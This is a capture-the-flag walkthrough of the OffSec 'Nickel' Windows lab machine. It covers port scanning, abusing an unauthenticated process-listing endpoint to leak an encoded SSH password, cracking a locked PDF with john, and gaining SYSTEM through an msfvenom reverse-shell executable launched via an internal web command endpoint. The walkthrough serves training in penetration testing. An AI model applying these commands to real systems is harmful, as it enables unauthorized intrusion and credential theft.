Skip to main content

nickel Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)

Scanning

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 125 FileZilla ftpd 0.9.60 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYR4Bx82VWETlsjIFs21j6lZ6/S40jMJvuXF+ay4Qz4b+ws2YobB5h0+IrHdr3epMNFmSY8JXFWzIILhkvF/rmadXRtGwib1VZkSa3nr5oYdMajoWK0jOVSoFJmDTJvhj+T3XE7+Q0tEkQ2EeGPrz7nK5XWzBp8SZdywCE/iz1HLvUIlsOqpDWHSjrnjkUaaleTgoVTEi63Dx4inY2KS5mX2mnS/mLzMlLZ0qj8vL9gz6ZJgf7LMNhXb/pWOtxfn6zmSoVHXEXgubXwLtrn4wOIvbZkm5/uEx+eFzx1AOEQ2LjaKItEqLlP3E5sdutVP6yymDTGBtlXgfvtfGS2lgZiitorAXjjND6Sqcppp5lQJk2XSBJC58U0SzjXdyflJwsus5mnKnX79nKxXPNPwM6Z3Ki1O9vE+KsJ1dZJuaTINVgLqrgwJ7BCkI2HyojfqzjHs4FlYVHnukjqunG90OMyAASSR0oEnUTPqFmrtL/loEc3h44GT+8m9JS1LgdExU=
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDJYE805huwKUl0fJM8+N9Mk7GUQeEEc5iA/yYqgxE7Bwgz4h5xufRONkR6bWxcxu8/AHslwkkDkjRKNdr4uFzY=
|   256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL8cLYuHBTVFfYPb/YzUIyT39bUzA/sPDFEC/xChZyZ4
80/tcp    open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-10-11T20:25:45+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2025-10-11T20:24:44+00:00
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-10T20:19:58
| Not valid after:  2026-04-11T20:19:58
| MD5:   ba53:9831:6e0d:8948:9314:f277:538e:7401
| SHA-1: c4ce:3137:8bed:b8c4:bd28:46ee:abdd:979a:bf1f:4705
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQHhERqiYFR6lF+j5b7iWPDDANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZuaWNrZWwwHhcNMjUxMDEwMjAxOTU4WhcNMjYwNDExMjAxOTU4
| WjARMQ8wDQYDVQQDEwZuaWNrZWwwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDCXZgj7GrKKmqiIR+X8wdw+QLifAN5A5oTbcawzniofJDBT1YY+cnJdQKB
| q8/tDLH/3vxJMR4CdGNtTb2zcIMXZrDUjCRpht6BrcI4IMlcrrxJdeGerC+ipPEx
| AidFy9it4Tt1gsUv+ESn6e2aLB7UIauSvz80JeuW2D3VMH4m64lhP+KXbluAY7jN
| E/B58kkOBnSg4AhRuIoRNk9qG01QLUqC3drxLkOeBw3KA1WikNNg1fdJ8P/B5L7T
| P1uTju8IMpbwQFxYKrhbB6vkIXNwbOHEeMdTpwlXdamA9H/3SaZJPukkpGMQ69nO
| gIKf2LgZ5tZU5K9dgrobMvp9F7s9AgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAr3ylKEAEQ2P9kF71
| M2L0Tyqnq2NzFmoo7E6fJTvzPbqxgkVDH2mhj4ufYjBrypXlvsgDvqlE8t43sOGE
| dmNVDJ273A8h3/CbL0OflC5NhzVzPPpdwnkNnkhS39bh1zlAEAADytPVukvfnJAO
| 7AFB2pJf9/G8sKx42R5rVT3tAEyAhiuT5B0lncHGFZWvsgdQxC3IKFF2p7hi5NnT
| iLTu/YzoSA12GTR6wNg0lT+Fmsy5QLDWJMx//dTnlYrD9AzN/LLyM6Ve7qrkIsFM
| TQTM14yewdKaBFYJlfgBZLDypsvVf66mE7L7FyeKb9e5UZZcySkCLArtu3aPJZGP
| g86U7g==
|_-----END CERTIFICATE-----
5040/tcp  open  unknown       syn-ack ttl 125
7680/tcp  open  pando-pub?    syn-ack ttl 125
8089/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
33333/tcp open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
|_http-title: Site doesn't have a title.
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-11T20:24:48
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 45048/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 24613/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 41336/udp): CLEAN (Failed to receive data)
|   Check 4 (port 17980/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Enumeartion

we'll start our enumeartion with web as always.

Enumearting HTTP port 8089 and 33333

Looking at the website 8089 it gives 3 links alt text

Looking at the source code it is redireting to port 33333 alt text

When trying to use get we got the error alt text

So changed the method and got this response. alt text

As per the error it now needs Length so we add content-length now. alt text

So I tested against all the end points. and got reponse for running process end point. alt text

└─$ curl -X POST -i http://nickel:33333/list-running-procs -H "Content-Length: 0"

alt text

and in the same process I found this : alt text

So now we have user and pass ariah:Tm93aXNlU2xvb3BUaGVvcnkxMzkK

Initial Access

I tried with the discovered User and Pass but it was failing so I tried to decode it.

alt text And Got a plain text pass and it worked for login into ssh.

alt text

Privilege Escalation

Post Exploitation Enum.

While going through the files and folders manually found this folder ftp and there was a PDF.

alt text

Trasferred it to my machine using scp.

PS C:\ftp> scp .\Infrastructure.pdf kali@192.168.45.170:/home/kali/Documents/offsec/pg_practice/nickel/

When Tried opening it Pdf was locked with a password. alt text

So used ftp2john to get the hash of the pass and tried cracking it with johntheripper.

pdf2john Infrastructure.pdf 
john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash

alt text

was able to unlok the pdf and found this inside it but seems irrevelant. Rabbit hole ? alt text

since the document says http possible that there is internal server running which is not scanned from outside ?

alt text

Found that port 80 is also running. So tried accessing using curl form the system and after some hit and tries was able to get the meaning of it.

alt text

Escalation

Created reverse shell using msfvenom

─$ msfvenom --payload windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=443 -f exe > rev2.exe

Downloaded and executed on the victim machine

curl http://127.0.0.1/?C:\Users\ariah\rev2.exe

alt text